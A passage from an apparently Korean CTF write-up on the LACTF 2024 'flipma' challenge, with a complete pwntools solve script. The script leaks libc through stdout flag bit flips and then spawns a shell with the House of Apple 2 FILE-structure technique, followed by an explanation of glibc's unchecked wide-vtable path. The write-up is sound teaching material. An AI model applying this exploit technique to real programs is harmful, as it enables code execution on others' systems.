0)<\/pre>\n\n\n\n<p><strong>3. \uae30\ud0c0 <code>stderr<\/code> \ud544\ub4dc \uc124\uc815<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>stderr-&gt;vtable<\/code> \u2192 <code>_IO_wfile_jumps<\/code>\ub85c \uc124\uc815\n<ul class=\"wp-block-list\">\n<li>\uc774\ub85c \uc778\ud574 \uc6d0\ub798 <code>_IO_new_file_overflow<\/code> \ub300\uc2e0 <code>_IO_wfile_overflow<\/code> \ud638\ucd9c\ub428<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># (struct _IO_FILE_plus *)->vtable = _IO_wfile_jumps\naaw(libc_stdout + 0xD8, libc_wfile_jumps, libc_file_jumps)<\/pre>\n\n\n\n<p><strong>4. <code>stderr-&gt;_flags<\/code> \uac12\uc744 \uc801\uc808\ud788 \uc124\uc815<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc911\uc694 \uc0ac\ud56d:\n<ul class=\"wp-block-list\">\n<li>\ub9c8\uc9c0\ub9c9\uc5d0 <code>wide_vtable-&gt;__doallocate(stderr)<\/code> \u2192 <code>system(stderr)<\/code>\uc774 \ud638\ucd9c\ub428<\/li>\n\n\n\n<li>\uc989, <code>system<\/code>\uc758 \uc778\uc790\ub85c\ub294 <code>stderr-&gt;_flags<\/code>\uac00 \ubb38\uc790\uc5f4 \uc2dc\uc791 \uc8fc\uc18c\ub85c \uc0ac\uc6a9\ub428<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\uc870\uac74\ub3c4 \ub9cc\uc871\ud558\uba74\uc11c \uc6d0\ud558\ub294 \uba85\ub839\uc744 \uc2e4\ud589\uc2dc\ud0a4\uae30 \uc704\ud55c \ud2b8\ub9ad:\n<ul class=\"wp-block-list\">\n<li><strong>roderick01<\/strong> \ubc29\uc2dd:\n<ul class=\"wp-block-list\">\n<li><code>_flags<\/code>\uc5d0 <code>\" sh\"<\/code> (\uc55e\uc5d0 \uacf5\ubc31 2\uac1c \ud3ec\ud568\ub41c \ubb38\uc790\uc5f4) \uc124\uc815<\/li>\n\n\n\n<li>\uc870\uac74 \ub9cc\uc871 + <code>system(\" sh\")<\/code> \ud638\ucd9c\ub428<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">aaw(libc_stdout, uu64(b\"  sh;\"), 0x00000000fbad3887)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\nwarnings.filterwarnings('ignore')\n \n# p = process('.\/flipma', level=\"debug\")\np = process('.\/flipma')\n\ne = ELF('.\/flipma',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6',checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\n# _IO_2_1_stdout_->flags \n#0x00000000fbad2087 \u2192 0x00000000fbad2887 \nsla(\"a: \", str(0xD21))\nsla(\"b: \", str(3))\n\n# _IO_2_1_stdout_->flags \n#0x00000000fbad2887 \u2192 0x00000000fbad3887 \nsla(\"a: \", str(0xD21))\nsla(\"b: \", str(4))\n\n# _IO_2_1_stdout_\u2192_IO_write_base\n#0x7ffff7fb2723 \u2192 0x7ffff7fb0723  \nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(5))\n\n# no change\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))\n\nleak = p.recvuntil(b\"we\")\nlibc_base = u64(leak[5:5+8]) - 0x157f10 \nbin_base = u64(leak[0x825:0x825+8]) - 0x4020\nsuccess(f\"libc_base: {hex(libc_base)}\")\nsuccess(f\"bin_base: {hex(bin_base)}\")\n\nflips = bin_base + e.symbols[\"flips\"]\nlibc_stdin = libc_base + l.symbols[\"_IO_2_1_stdin_\"]\nsuccess(f\"flips: {hex(flips)}\")\nsuccess(f\"stdin: {hex(libc_stdin)}\")\n\nsla(\"a: \", str(flips - libc_stdin))\nsla(\"b: \", str(7))\n\nlibc_stdout = libc_base + l.symbols[\"_IO_2_1_stdout_\"]\nlibc_file_jumps = libc_base + l.symbols[\"_IO_file_jumps\"]\nlibc_wfile_jumps = libc_base + l.symbols[\"_IO_wfile_jumps\"]\nsuccess(f\"libc_stdout: {hex(libc_stdout)}\")\nsuccess(f\"libc_file_jumps: {hex(libc_file_jumps)}\")\nsuccess(f\"libc_wfile_jumps: {hex(libc_wfile_jumps)}\")\n\ndef convert_old(_to, _from):\n    for i in range(255):\n        if _to == (_from ^ (1 &lt;&lt; i)):\n            return i\n        \ndef convert(_to, _from):\n    \"\"\"\n    _from \uc5d0\uc11c _to \ub85c \uac00\uae30 \uc704\ud574 \ub4a4\uc9d1\uc5b4\uc57c \ud560 \ube44\ud2b8\uc758 \uc778\ub371\uc2a4\ub97c\n    \ud55c \ubc88\uc5d0 \ud558\ub098\uc529 \uc21c\uc11c\ub300\ub85c \ubc18\ud658\ud569\ub2c8\ub2e4.\n    \"\"\"\n    seq = []\n    diff = _from ^ _to\n    # diff \uac00 0 \uc774 \ub420 \ub54c\uae4c\uc9c0 \ubc18\ubcf5\n    while diff:\n        # \ucd5c\ud558\uc704 1\ube44\ud2b8\ub9cc \ucd94\ucd9c\n        lowest = diff &amp; -diff\n        # \uadf8 \ube44\ud2b8 \uc704\uce58 \uacc4\uc0b0\n        i = lowest.bit_length() - 1\n        seq.append(i)\n        # _from \uc5d0\uc11c \ud574\ub2f9 \ube44\ud2b8\ub97c \ub4a4\uc9d1\uc5b4 \uc8fc\uace0\n        _from ^= (1 &lt;&lt; i)\n        # \ub2e4\uc74c diff \uac31\uc2e0\n        diff = _from ^ _to\n    return seq\n        \ndef aaw(addr, val, orig):\n    val_bytes = val.to_bytes(8, byteorder='little')  \n    orig_bytes = orig.to_bytes(8, byteorder='little')  \n\n    for i in range(8):\n        # print(f\"val_bytes[i]: {hex(val_bytes[i])}\")\n        # print(f\"orig_bytes[i]: {hex(orig_bytes[i])}\")\n        # print(f\"convert(val_bytes[i], orig_bytes[i]): {convert(val_bytes[i], orig_bytes[i])}\")\n        b_list = convert(val_bytes[i], orig_bytes[i])\n        for j in range(len(b_list)):\n            sla(\"a: \", str(addr+i - libc_stdin))\n            sla(\"b: \", str(b_list[j]))\n\nnew_vtable = libc_base + 0x1ED800\ninfo(f\"new_vtable: {hex(new_vtable)}\")\n# pause()\n# aaw(libc_stdout + 0xA0, 0x4142434445464748, libc_base + 0x1EC880)\n\n# def aaw(addr, new, orig):\n# (struct _IO_FILE_plus *)->_wide_data = new_vtable\naaw(libc_stdout + 0xA0, new_vtable, libc_base + 0x1EC880)\n# (struct _IO_wide_data*)->_wide_vtable = new_vtable + 0x100\naaw(new_vtable + 0xE0, new_vtable + 0x100, 0)\n# (struct _IO_jump_t *)->__doallocate = system\naaw(new_vtable + 0x168, libc_base+l.symbols[\"system\"], 0)\n# (struct _IO_FILE_plus *)->vtable = _IO_wfile_jumps\naaw(libc_stdout + 0xD8, libc_wfile_jumps, libc_file_jumps)\n\naaw(libc_stdout, uu64(b\"  sh;\"), 0x00000000fbad3887)\n\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))\n\np.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@ubuntu:~\/study\/LACTF2024\/flipma$ python3 solve.py\n[+] Starting local process '.\/flipma': pid 16999\n[+] libc_base: 0x7ffff7dc5000\n[+] bin_base: 0x555555554000\n[+] flips: 0x555555558010\n[+] stdin: 0x7ffff7fb1980\n[+] libc_stdout: 0x7ffff7fb26a0\n[+] libc_file_jumps: 0x7ffff7fae4a0\n[+] libc_wfile_jumps: 0x7ffff7fadf60\n[*] new_vtable: 0x7ffff7fb2800\n[*] Switching to interactive mode\n$ id\nuid=1000(seo) gid=1000(seo) groups=1000(seo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),133(lxd),134(sambashare)\n$ whoami\nseo\n$ ls\nflipma     libc.so.6.id0  libc.so.6.id2  libc.so.6.til  solve2.py  test.py\nlibc.so.6  libc.so.6.id1  libc.so.6.nam  prob           solve.py\n$<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">About House of Apple<\/h2>\n\n\n\n<p><strong>Reference<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/chovid99.github.io\/posts\/stack-the-flags-ctf-2022\/**\">https:\/\/chovid99.github.io\/posts\/stack-the-flags-ctf-2022\/<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Gaining Remote Code Execution (RCE)<\/strong><\/h3>\n\n\n\n<p>\uc9c0\uae08\uae4c\uc9c0 \uc6b0\ub9ac\ub294 \ub2e4\uc74c\uacfc \uac19\uc740 \uc0c1\ud669\uc5d0 \ub3c4\ub2ec\ud588\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>libc \uc601\uc5ed\uc5d0 \ub300\ud55c OOB(Out-Of-Bounds) \uc4f0\uae30 \ucde8\uc57d\uc810\uc744 \ubcf4\uc720\ud558\uace0 \uc788\uc74c<\/li>\n\n\n\n<li>\uc815\ubcf4 \uc720\ucd9c\uc744 \ud1b5\ud574 libc\uc758 base \uc8fc\uc18c\ub97c \ud68d\ub4dd\ud568<\/li>\n<\/ul>\n\n\n\n<p>\uc774\uc81c \uc6b0\ub9ac\ub294 \uc774 OOB \ubc84\uadf8\uc640 \uc720\ucd9c\ub41c libc base \uc8fc\uc18c \uc815\ubcf4\ub97c \ud65c\uc6a9\ud574\uc11c RCE(Remote Code Execution)\ub97c \ub2ec\uc131\ud574\uc57c \ud569\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ucd5c\uadfc\uc5d0 \ub17c\uc758\ud588\ub358 glibc 2.35\uc5d0\uc11c FILE \uad6c\uc870\uccb4 \uacf5\uaca9\uc744 \ud1b5\ud574 RIP \uc81c\uc5b4\ub97c \uc5bb\ub294 \ubc29\ubc95\uc5d0 \ub300\ud55c \uc9c0\uc2dd\uc744 \uc801\uc6a9\ud574\ubcfc \uc218 \uc788\uaca0\ub2e4\ub294 \uc0dd\uac01\uc774 \ub4ed\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ubc30\uacbd \uc124\uba85\uc744 \uc704\ud574, glibc\uc758 \uad6c\ubc84\uc804\uc5d0\uc11c\ub294 <code>file-&gt;vtable<\/code> \uc8fc\uc18c\ub97c \uc6b0\ub9ac\uac00 \ub9cc\ub4e0 \uac00\uc9dc vtable\ub85c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc5c8\uace0,<\/p>\n\n\n\n<p>\uc774\ub807\uac8c \ub418\uba74 \uc608\ub97c \ub4e4\uc5b4 <code>_IO_OVERFLOW<\/code> \uba54\uc11c\ub4dc\uac00 \ud638\ucd9c\ub420 \ub54c, \uc2e4\uc81c \ud568\uc218 \uc8fc\uc18c\uac00 \uc544\ub2cc \uc6b0\ub9ac\uac00 \uc124\uc815\ud55c \uc8fc\uc18c\ub85c \uc810\ud504\ud558\uac8c \ub9cc\ub4e4 \uc218 \uc788\uc5c8\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ud558\uc9c0\ub9cc, \uc774\ub294 glibc \uce21\uc5d0\uc11c \ubc29\uc5b4\uac00 \ucd94\uac00\ub418\uc5b4 \ub354 \uc774\uc0c1 \uc27d\uac8c \uc0ac\uc6a9\ud560 \uc218 \uc5c6\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>glibc\ub294 FILE \uad6c\uc870\uccb4\uc5d0 \uc800\uc7a5\ub41c vtable\uc774 \uc62c\ubc14\ub978 \uc601\uc5ed\uc5d0 \uc874\uc7ac\ud558\ub294\uc9c0 \uc5ec\ubd80\ub97c \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798 LOC(\ucf54\ub4dc \ub77c\uc778)\ub97c \ucc38\uace0\ud558\uc2ed\uc2dc\uc624:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">static inline const struct _IO_jump_t *\nIO_validate_vtable (const struct _IO_jump_t *vtable)\n{\n  \/* Fast path: The vtable pointer is within the __libc_IO_vtables\n     section.  *\/\n  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;\n  uintptr_t ptr = (uintptr_t) vtable;\n  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;\n  if (__glibc_unlikely (offset >= section_length))\n    \/* The vtable pointer is not in the expected section.  Use the\n       slow path, which will terminate the process if necessary.  *\/\n    _IO_vtable_check ();\n  return vtable;\n}\n\n#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)\n\n#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)\n\n# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))\n\n#define _IO_JUMPS_FILE_plus(THIS) \\\n  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE_plus, vtable)\n<\/pre>\n\n\n\n<p>\uc608\ub97c \ub4e4\uc5b4 \uc5b4\ub5a4 \uba54\uc11c\ub4dc\uac00 <code>_IO_OVERFLOW<\/code>\ub97c \ud638\ucd9c\ud558\ub824\uace0 \ud560 \ub54c, \ud574\ub2f9 \uba54\uc11c\ub4dc\ub294 <code>vtable<\/code> \ub0b4\uc5d0\uc11c <code>__overflow<\/code> \ud0a4\uc5d0 \ub9e4\ud551\ub41c \ud3ec\uc778\ud130\ub85c \uc810\ud504\ub97c \uc2dc\ub3c4\ud558\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uadf8\ub7ec\ub098 \uc810\ud504\ub97c \uc218\ud589\ud558\uae30 \uc804\uc5d0 <code>IO_validate_vtable<\/code>\uc744 \ud638\ucd9c\ud558\uc5ec \ud574\ub2f9 \ud3ec\uc778\ud130\uac00 \uc720\ud6a8\ud55c \uc601\uc5ed\uc5d0 \uc704\uce58\ud574 \uc788\ub294\uc9c0 \uba3c\uc800 \uac80\uc99d\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774\ub85c \uc778\ud574, \uacfc\uac70\ucc98\ub7fc \uc6b0\ub9ac\uac00 \uac00\uc9dc vtable\uc744 \uc124\uc815\ud574 \uc784\uc758\uc758 \uba54\uc11c\ub4dc\ub85c \uc810\ud504\ud558\uac8c \ub9cc\ub4dc\ub294 \ud2b8\ub9ad\uc740 \ub354 \uc774\uc0c1 \uc791\ub3d9\ud558\uc9c0 \uc54a\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc65c\ub0d0\ud558\uba74 glibc\ub294 \uc774\uc81c vtable\uc774 \uc62c\ubc14\ub978 \uba54\ubaa8\ub9ac \uc601\uc5ed\uc5d0 \uc788\ub294\uc9c0\ub97c \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ud558\uc9c0\ub9cc \uc774 \uac80\uc0ac\ub294 \uc624\uc9c1 &#8220;\uc800\uc7a5\ub41c \ud3ec\uc778\ud130\uac00 vtable \uc601\uc5ed\uc5d0 \uc874\uc7ac\ud558\ub294\uac00?&#8221;\ub9cc \uac80\uc99d\ud560 \ubfd0\uc774\uae30 \ub54c\ubb38\uc5d0, \uc6b0\ub9ac\ub294 \uc5ec\uc804\ud788 vtable\uc744 &#8220;\ubbf8\uc2a4\uc5bc\ub77c\uc778(misalignment)&#8221; \uc2dc\ud0a4\ub294 \ubc29\uc2dd\uc73c\ub85c \uc6b0\ud68c\ud560 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc608\ub97c \ub4e4\uc5b4 vtable\uc744 \ud55c \uc5d4\ud2b8\ub9ac\ub9cc\ud07c \ubc00\uc5b4\ubc84\ub9ac\uba74, <code>_IO_OVERFLOW<\/code>\ub97c \ud638\ucd9c\ud560 \ub54c \uc6d0\ub798\uc758 \uc704\uce58\uac00 \uc544\ub2cc <code>_IO_UNDERFLOW<\/code> \ub4f1 \ub2e4\ub978 \ud568\uc218\ub85c \uc798\ubabb \uc810\ud504\ud558\uac8c \ub9cc\ub4e4 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774\ub7ec\ud55c \uc6b0\ud68c \ubc29\ubc95\uc744 \uc545\uc6a9\ud558\ub824\ub294 \uc2dc\ub3c4\ub4e4\uc774 \uc788\uc5c8\uace0, \ucd5c\uadfc\uc5d0\ub294 <strong>kylebot<\/strong>\uc774\ub77c\ub294 \uc0ac\ub78c\uc774 \uc791\uc131\ud55c \uae00\uc5d0\uc11c \ub2e4\uc74c\uacfc \uac19\uc740 \uc0ac\uc2e4\uc774 \ubc1c\uacac\ub418\uc5c8\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n<p>glibc\ub294 <code>_IO_JUMPS_FUNC<\/code> \ub9e4\ud06c\ub85c\ub97c \ud1b5\ud574 \uc810\ud504\ud560 \ub54c\ub9cc vtable\uc5d0 \ub300\ud55c \uc720\ud6a8\uc131 \uac80\uc0ac\ub97c \uc218\ud589\ud558\uace0, wide vtable\uc5d0 \ub300\ud574 \uc810\ud504\ud560 \ub54c \uc0ac\uc6a9\ud558\ub294 <code>_IO_WIDE_JUMPS_FUNC<\/code> \ub9e4\ud06c\ub85c\uc5d0\uc11c\ub294 \uac80\uc0ac\ub97c \uc218\ud589\ud558\uc9c0 \uc54a\ub294\ub2e4\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uadf8\ub9ac\uace0 \uba87 \ub2ec \uc804, \uc774\uc640 \ub3d9\uc77c\ud55c \ucde8\uc57d\uc810\uc744 \uc545\uc6a9\ud558\ub824 \ud55c \ub610 \ub2e4\ub978 \uae30\uc0ac\uac00 \ubc1c\ud45c\ub418\uc5c8\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ubc14\ub85c <strong>House of Apple 2<\/strong>\ub77c\ub294 \uacf5\uaca9 \uae30\ubc95\uc73c\ub85c, \uc774\ub294 <strong>roderick01<\/strong>\uc774\ub77c\ub294 \uc791\uc131\uc790\uac00 \ud574\ub2f9 \uae00\uc5d0\uc11c \uc18c\uac1c\ud55c \ubc29\uc2dd\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc9c0\uae08\ubd80\ud130\ub294 \uc774 \ub450 \ube14\ub85c\uadf8\ub97c \uc77d\uc73c\uba70 \uc774\ud574\ud55c \ubc14\ub97c \ubc14\ud0d5\uc73c\ub85c \uc880 \ub354 \uc790\uc138\ud788 \uc124\uba85\ud574\ubcf4\uaca0\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uba3c\uc800 \uae30\uc5b5\ud574\uc57c \ud560 \uc810\uc740, \ucd5c\uc2e0 glibc\uc5d0 \ub3c4\uc785\ub41c \ud574\ub2f9 \ubcf4\uc548 \uae30\ubc95\uc740 <strong>FILE \uad6c\uc870\uccb4\uc5d0 \uc800\uc7a5\ub41c vtable\uc774 \uc62c\ubc14\ub978 \uc601\uc5ed\uc5d0 \uc874\uc7ac\ud558\ub294\uc9c0 \uc5ec\ubd80<\/strong>\ub9cc \ud655\uc778\ud55c\ub2e4\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ud45c\uc900 \ud30c\uc77c \uac1d\uccb4\uac00 \uc0ac\uc6a9\ud558\ub294 \uae30\ubcf8 vtable\uc740 <code>_IO_file_jumps<\/code>\uc785\ub2c8\ub2e4. \ud558\uc9c0\ub9cc \uc2e4\uc81c\ub85c\ub294 \uc774 \uc601\uc5ed\uc5d0 \ub2e4\ub978 vtable\ub3c4 \ub2e4\uc218 \uc874\uc7ac\ud558\uace0,<\/p>\n\n\n\n<p>\uadf8\uc911 \ud558\ub098\uac00 \ubc14\ub85c <code>_IO_wfile_jumps<\/code>\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798\ub294 GDB\ub97c \ud1b5\ud574 \ucd9c\ub825\ud55c <code>_IO_wfile_jumps<\/code>\uc758 \uae30\ubcf8 \uc5d4\ud2b8\ub9ac \ub0b4\uc6a9\uc785\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  print __GI__IO_wfile_jumps\n$11 = {\n  __dummy = 0x0,\n  __dummy2 = 0x0,\n  __finish = 0x7ffff7e20070 &lt;_IO_new_file_finish>,\n  __overflow = 0x7ffff7e1a410 &lt;__GI__IO_wfile_overflow>,\n  __underflow = 0x7ffff7e19050 &lt;__GI__IO_wfile_underflow>,\n  __uflow = 0x7ffff7e178c0 &lt;__GI__IO_wdefault_uflow>,\n  __pbackfail = 0x7ffff7e17680 &lt;__GI__IO_wdefault_pbackfail>,\n  __xsputn = 0x7ffff7e1a8c0 &lt;__GI__IO_wfile_xsputn>,\n  __xsgetn = 0x7ffff7e1f330 &lt;__GI__IO_file_xsgetn>,\n  __seekoff = 0x7ffff7e197d0 &lt;__GI__IO_wfile_seekoff>,\n  __seekpos = 0x7ffff7e22530 &lt;_IO_default_seekpos>,\n  __setbuf = 0x7ffff7e1e620 &lt;_IO_new_file_setbuf>,\n  __sync = 0x7ffff7e1a720 &lt;__GI__IO_wfile_sync>,\n  __doallocate = 0x7ffff7e13f10 &lt;_IO_wfile_doallocate>,\n  __read = 0x7ffff7e1f9b0 &lt;__GI__IO_file_read>,\n  __write = 0x7ffff7e1ef40 &lt;_IO_new_file_write>,\n  __seek = 0x7ffff7e1e6f0 &lt;__GI__IO_file_seek>,\n  __close = 0x7ffff7e1e610 &lt;__GI__IO_file_close>,\n  __stat = 0x7ffff7e1ef30 &lt;__GI__IO_file_stat>,\n  __showmanyc = 0x7ffff7e234a0 &lt;_IO_default_showmanyc>,\n  __imbue = 0x7ffff7e234b0 &lt;_IO_default_imbue>\n}<\/pre>\n\n\n\n<p>\uc774\uc81c <code>_IO_wfile_overflow<\/code> \ud568\uc218\uc758 \uad6c\ud604\uc744 \ud55c\ubc88 \uc0b4\ud3b4\ubcf4\uaca0\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc774 \ud568\uc218\ub294 <strong>kylebot<\/strong>\uacfc <strong>roderick01<\/strong> \ub450 \uc0ac\ub78c\uc774 \ubaa8\ub450 \ubc1c\uacac\ud55c \ucde8\uc57d \uacbd\ub85c \uc911 \ud558\ub098\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">wint_t\n_IO_wfile_overflow (FILE *f, wint_t wch)\n{\n  if (f->_flags &amp; _IO_NO_WRITES) \/* SET ERROR *\/\n    {\n      f->_flags |= _IO_ERR_SEEN;\n      __set_errno (EBADF);\n      return WEOF;\n    }\n  \/* If currently reading or no buffer allocated. *\/\n  if ((f->_flags &amp; _IO_CURRENTLY_PUTTING) == 0)\n    {\n      \/* Allocate a buffer if needed. *\/\n      if (f->_wide_data->_IO_write_base == 0)\n\t{\n\t  _IO_wdoallocbuf (f);\n\t  ...\n\t}\n      ...\n}\n\nvoid\n_IO_wdoallocbuf (FILE *fp)\n{\n  if (fp->_wide_data->_IO_buf_base)\n    return;\n  if (!(fp->_flags &amp; _IO_UNBUFFERED))\n    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)\n      ...\n}\n\n#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)\n\n#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)\n\n#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)\n\n#define _IO_WIDE_JUMPS(THIS) \\\n  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable\n<\/pre>\n\n\n\n<p>\uc704\uc5d0\uc11c \ubcfc \uc218 \uc788\ub4ef\uc774, \uc6b0\ub9ac\uac00 <code>WJUMP0<\/code>\ub97c \ud2b8\ub9ac\uac70\ud560 \uc218 \uc788\ub2e4\uba74 <code>wide_vtable<\/code>\uc5d0 \uc800\uc7a5\ub41c \ud3ec\uc778\ud130\uac00 \uc62c\ubc14\ub978 \uc601\uc5ed\uc5d0 \uc788\ub294\uc9c0\uc5d0 \ub300\ud55c <strong>\uac80\uc99d\uc774 \uc804\ud600 \uc774\ub8e8\uc5b4\uc9c0\uc9c0 \uc54a\uc2b5\ub2c8\ub2e4<\/strong>.<\/p>\n\n\n\n<p>\uc989, \uc6b0\ub9ac\uac00 \uac00\uc9dc <code>wide_vtable<\/code>\uc744 \uc870\uc791\ud558\uace0 \ub9e4\ud06c\ub85c \ud638\ucd9c(<code>WJUMP0<\/code>)\uc744 \uc720\ub3c4\ud560 \uc218 \uc788\ub2e4\uba74, <strong>\uacfc\uac70 glibc\ucc98\ub7fc \uc6b0\ub9ac\uac00 \uc6d0\ud558\ub294 \uc784\uc758\uc758 \uc8fc\uc18c\ub85c \uc810\ud504<\/strong>\ud560 \uc218 \uc788\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\ub610\ud55c \uc8fc\ubaa9\ud560 \uc810\uc740, <code>_IO_WIDE_JUMPS<\/code> \ud638\ucd9c \uc2dc \uc0ac\uc6a9\ub418\ub294 vtable\uc740 <code>fp-&gt;_wide_data-&gt;_wide_vtable<\/code>\uc5d0\uc11c \uac00\uc838\uc628\ub2e4\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\n<p>gdb\uc5d0\uc11c <code>stdfile<\/code> \uad6c\uc870\uccb4\ub97c \ud655\uc778\ud574\ubcf4\uba74, \uadf8 \uc548\uc5d0 <code>_wide_data<\/code>\ub77c\ub294 \ud544\ub4dc\uac00 \uc788\uace0, \uc774\ub294 <code>_IO_wide_data_1<\/code>\uc774\ub77c\ub294 \ub610 \ub2e4\ub978 \uad6c\uc870\uccb4\ub97c \uac00\ub9ac\ud0b5\ub2c8\ub2e4.<\/p>\n\n\n\n<p>\uc544\ub798\ub294 gdb\ub97c \ud1b5\ud574 \ucd9c\ub825\ud55c <code>_IO_wide_data_1<\/code> \uad6c\uc870\uccb4 \ub0b4 \ud544\ub4dc\uc785\ub2c8\ub2e4:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  print _IO_wide_data_1\n$10 = {\n  _IO_read_ptr = 0x0,\n  _IO_read_end = 0x0,\n  _IO_read_base = 0x0,\n  _IO_write_base = 0x0,\n  _IO_write_ptr = 0x0,\n  _IO_write_end = 0x0,\n\n...\n\n  _shortbuf = L\"\",\n  _wide_vtable = 0x7ffff7faa0c0 &lt;__GI__IO_wfile_jumps> &lt;- This is the one that we can overwrite with our fake vtable\n}<\/pre>\n\n\n\n<p>\uc774 \uc815\ubcf4\ub97c \ubc14\ud0d5\uc73c\ub85c \ubcf4\uba74, \ub9cc\uc57d \uc6b0\ub9ac\uac00 <code>FILE<\/code> \uad6c\uc870\uccb4\uc758 vtable\uc744 <code>_IO_file_jumps<\/code>\uc5d0\uc11c <code>_IO_wfile_jumps<\/code>\ub85c <strong>\ubbf8\uc2a4\uc5bc\ub77c\uc778<\/strong>\uc2dc\ud0a4\uace0, <code>__overflow<\/code> \ud638\ucd9c\uc744 \ud2b8\ub9ac\uac70\ud560 \uc218 